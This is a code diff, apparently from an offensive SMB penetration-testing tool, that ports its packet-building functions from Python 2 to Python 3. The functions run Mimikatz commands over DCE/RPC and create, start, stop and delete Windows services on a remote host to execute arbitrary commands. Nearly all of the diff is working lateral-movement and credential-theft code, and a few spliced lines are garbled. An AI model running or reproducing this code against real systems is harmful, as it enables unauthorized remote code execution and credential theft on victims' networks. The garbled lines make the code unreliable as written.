+ head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
x = SMBDCEData(CTX0UID=UID, CTX0UIDVersion=Version)
x.calculate()
f = data[42:44]
- t = SMBDCERPCWriteData(FID=f,Data=x)
+ t = SMBDCERPCWriteData(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC Read.
- if data[8:10] == "\x2f\x00":
- head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
- t = SMBReadData(FID=f,MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00")
- t.calculate()
- packet0 = str(head)+str(t)
- buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
- data = s.recv(2048)
- return data, s, f
+ if data[8:10] == b"\x2f\x00":
+ head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+ t = SMBReadData(FID=f.decode('latin-1'),MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00")
+ t.calculate()
+ packet0 = str(head)+str(t)
+ buffer1 = longueur(packet0)+packet0
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
+ return data, s, f
###########################
#Launch A Mimikatz CMD
###########################
def MimiKatzRPC(Command, f, host, data, s):
- ## DCE/RPC MimiKatzRPC.
- ## DCE/RPC Write.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
- w = SMBDCEMimiKatzRPCCommand(CMD=Command)
- w.calculate()
- x = SMBDCEPacketData(Data=w, Opnum="\x03\x00")
- x.calculate()
- t = SMBDCERPCWriteData(FID=f,Data=x)
- t.calculate()
- packet0 = str(head)+str(t)
- buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
- data = s.recv(2048)
+ ## DCE/RPC MimiKatzRPC.
+ ## DCE/RPC Write.
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+ w = SMBDCEMimiKatzRPCCommand(CMD=Command)
+ w.calculate()
+ x = SMBDCEPacketData(Data=w, Opnum="\x03\x00")
+ x.calculate()
+ t = SMBDCERPCWriteData(FID=f.decode('latin-1'),Data=x)
+ t.calculate()
+ packet0 = str(head)+str(t)
+ buffer1 = longueur(packet0)+packet0
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
- ## DCE/RPC Read.
- if data[8:10] == "\x2f\x00":
- head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
- t = SMBReadData(FID=f,MaxCountLow=struct.pack('60:
- minutes = Seconds/60
- print 'Fetched in: %.3g minutes.'%(minutes)
- if Seconds<60:
- print 'Fetched in: %.3g seconds'%(Seconds)
- print "Output:\n", Output
- return data,s,f
+ if data[64:66] == b"\x05\x00" and data[67] == b"\x03":##First and Last DCE/RPCFrag
+ data, s, out = SMBDCERPCReadOutput(StructWithLenPython2or3("60:
+ minutes = Seconds/60
+ print('Fetched in: %.3g minutes.'%(minutes))
+ if Seconds<60:
+ print('Fetched in: %.3g seconds'%(Seconds))
+ print("Output:\n", Output)
+ return data,s,f
######################################
#Launch And Create a MimiKatz Service
######################################
def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLOpenManagerW.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host)
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##Error handling.
- if data[8:10] == "\x2e\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
+ if data[8:10] == b"\x2e\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC Create Service.
- if data[8:10] == "\x25\x00":
- ContextHandler = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x25\x00":
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,BinCMD=Command)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
#print "[+] Creating service"
## DCE/RPC SVCCTLOpenService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to create the service\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
- ContextHandlerService = data[88:108]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandlerService = data[88:108].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
- ContextHandler = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLQueryService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to start the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x06\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLCloseService
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to query the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- return data, s, f
+ return data, s, f
###########################
#Stop And Delete A Service
###########################
def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLOpenManagerW.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host)
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##Error handling.
- if data[8:10] == "\x2e\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
+ if data[8:10] == b"\x2e\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to create the service\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
- ContextHandlerService = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandlerService = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandlerService,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLControlService, stop operation.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
- ContextHandlerService = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandlerService = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService, ControlOperation="\x01\x00\x00\x00")
x = SMBDCEPacketData(Opnum="\x01\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLDeleteService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to stop the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLCloseService
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to delete the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- return data, s, f
+ return data, s, f
###########################
@@ -831,143 +871,143 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
###########################
def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLOpenManagerW.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host)
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##Error handling.
- if data[8:10] == "\x2e\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
+ if data[8:10] == b"\x2e\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC Create Service.
- if data[8:10] == "\x25\x00":
- ContextHandler = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x25\x00":
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,BinCMD=Command)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
#print "[+] Creating service"
## DCE/RPC SVCCTLOpenService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to create the service\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
- ContextHandlerService = data[88:108]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandlerService = data[88:108].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
- ContextHandler = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLQueryService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to start the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x06\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLControlService, stop operation.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to query the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00")
x = SMBDCEPacketData(Opnum="\x01\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLDeleteService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to start the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLCloseService
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to delete the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- return data, s, f
+ return data, s, f
###########################
@@ -975,186 +1015,186 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
###########################
def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLOpenManagerW.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host)
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##Error handling.
- if data[8:10] == "\x2e\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
+ if data[8:10] == b"\x2e\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to create the service\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
#ContextHandlerService = data[88:108]
- ContextHandler = data[84:104]
